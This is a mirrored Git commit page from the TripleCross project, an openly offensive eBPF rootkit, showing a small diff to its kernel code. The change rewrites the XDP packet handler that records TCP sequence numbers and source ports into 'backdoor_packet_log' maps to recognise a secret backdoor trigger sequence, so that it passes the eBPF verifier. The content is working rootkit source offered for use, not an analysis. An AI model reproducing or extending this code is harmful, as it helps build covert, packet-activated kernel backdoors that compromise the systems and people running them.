admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-15 14:53:08 +08:00
Code Issues Packages Projects Releases Wiki Activity

Solve verifier issue when running XDP module, it complains because of array accesses #50

Browse Source
This commit is contained in:
h3xduck
2023-02-18 23:46:29 +01:00
parent 51bf3efc38
commit 6c7a0be982
2 changed files with 21 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
src/ebpf/include/bpf/fs.h
View File

@@ -45,7 +45,7 @@ struct sys_read_enter_ctx {
};
/**
* >> cat /sys/kernel/debug/tracing/events/syscalls/sys_enter_open/format
* >> cat /sys/kernel/debug/tracing/events/syscalls/sys_enter_openat/format
*/
struct sys_openat_enter_ctx {
unsigned long long unused;

22
src/ebpf/kit.bpf.c
View File

@@ -208,7 +208,13 @@ int xdp_receive(struct xdp_md *ctx){
if(last_modified != 0 && last_modified != 1 && last_modified != 2){
return XDP_PASS;
}
b_new_data_32.trigger_array[last_modified].seq_raw = tcp->seq;
if(last_modified==0){
b_new_data_32.trigger_array[0].seq_raw = tcp->seq;
}else if(last_modified==1){
b_new_data_32.trigger_array[1].seq_raw = tcp->seq;
}else if(last_modified==2){
b_new_data_32.trigger_array[2].seq_raw = tcp->seq;
}
bpf_map_update_elem(&backdoor_packet_log_32, &ipvalue, &b_new_data_32, BPF_ANY);
//If it was not the first packet received, this may be the end of the backdoor sequence (even if previous packets
//where for other purpose, we must still check it)
@@ -253,7 +259,19 @@ int xdp_receive(struct xdp_md *ctx){
if(last_modified != 0 && last_modified != 1 && last_modified != 2 && last_modified != 3 && last_modified != 4 && last_modified != 5){
return XDP_PASS;
}
b_new_data_16.trigger_array[last_modified].src_port = tcp->source;
if(last_modified==0){
b_new_data_16.trigger_array[0].src_port = tcp->source;
}else if(last_modified==1){
b_new_data_16.trigger_array[1].src_port = tcp->source;
}else if(last_modified==2){
b_new_data_16.trigger_array[2].src_port = tcp->source;
}else if(last_modified==3){
b_new_data_16.trigger_array[3].src_port = tcp->source;
}else if(last_modified==4){
b_new_data_16.trigger_array[4].src_port = tcp->source;
}else if(last_modified==5){
b_new_data_16.trigger_array[5].src_port = tcp->source;
}
bpf_map_update_elem(&backdoor_packet_log_16, &ipvalue, &b_new_data_16, BPF_ANY);
//If it was not the first packet received, this may be the end of the backdoor sequence (even if previous packets
//where for other purpose, we must still check it)